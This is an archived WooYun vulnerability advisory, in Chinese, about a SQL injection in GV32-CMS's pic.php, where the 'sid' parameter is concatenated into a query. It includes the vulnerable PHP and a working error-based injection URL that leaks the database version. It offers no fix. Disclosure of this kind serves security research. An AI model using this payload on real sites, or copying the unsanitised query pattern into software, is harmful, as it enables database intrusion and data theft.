当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-063985

漏洞标题:GV32-CMS sql注入漏洞

相关厂商:GV32-CMS

漏洞作者: Matt

提交时间:2014-07-01 11:52

修复时间:2014-09-29 18:12

公开时间:2014-09-29 18:12

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-07-01: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-09-29: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

GV32-CMS sql注入漏洞

详细说明:

application/www/pic.php
function infolist()
{

$sid = trim($_REQUEST["sid"]);//获取参数
$pageNum = trim($_REQUEST["pageNum"]);

$pageSize = 16 ;
if( $pageNum > 1 )
{
$pageNum = $pageNum;
$LIMITnum = ceil( ( $pageNum -1 ) * $pageSize );
}else{
$pageNum = 1;
$LIMITnum = 0 ;
}

$addsql = '';
$webtitle = '图片中心';
//处理你现在的位置
if( $GLOBALS["WebConfig"]["webhtml"] == 1 )
{
$nowaddress = '您的位置:<a href="'.BASE_WEBURL.'/">首页</a> > <a href="'.BASE_WEBURL.'/pic.html">图片中心</a>';
}else{
$nowaddress = '您的位置:<a href="'.BASE_WEBURL.'/">首页</a> > <a href="'.BASE_WEBURL.'/?load=pic&act=infolist">图片中心</a>';
}

//左则自定义内容
$sqlQuery = " SELECT per_id,per_column,per_main FROM ".SQL_PREFIX."personal WHERE per_type = 'piclist' ORDER BY `per_id` ";
$infoper = $GLOBALS['MySql'] -> selectOne($sqlQuery);
$GLOBALS['Getin'] -> getcolumn( $infoper["per_column"] );
if( $sid > 0 )
{
$addsql = " and pis_id = ".$sid;
$endArray["sid"] = $sid;
}
if( $sid != '' )
{
$seletsort = " SELECT pis_id,pis_name FROM ".SQL_PREFIX."picsort WHERE pis_id = ".$sid." or pis_parentid = ".$sid ;//注入
$sortInfo = $GLOBALS['MySql'] -> selectInfo($seletsort);
$sinid = '';
$addpage = '&sid='.$sid;
if($sortInfo!='')

漏洞证明:

测试
http://127.0.0.1/gv32/?load=pic&act=infolist&sid=111%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)

QQ截图20131103014513.png

修复方案:

你猜

版权声明:转载请注明来源 Matt@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝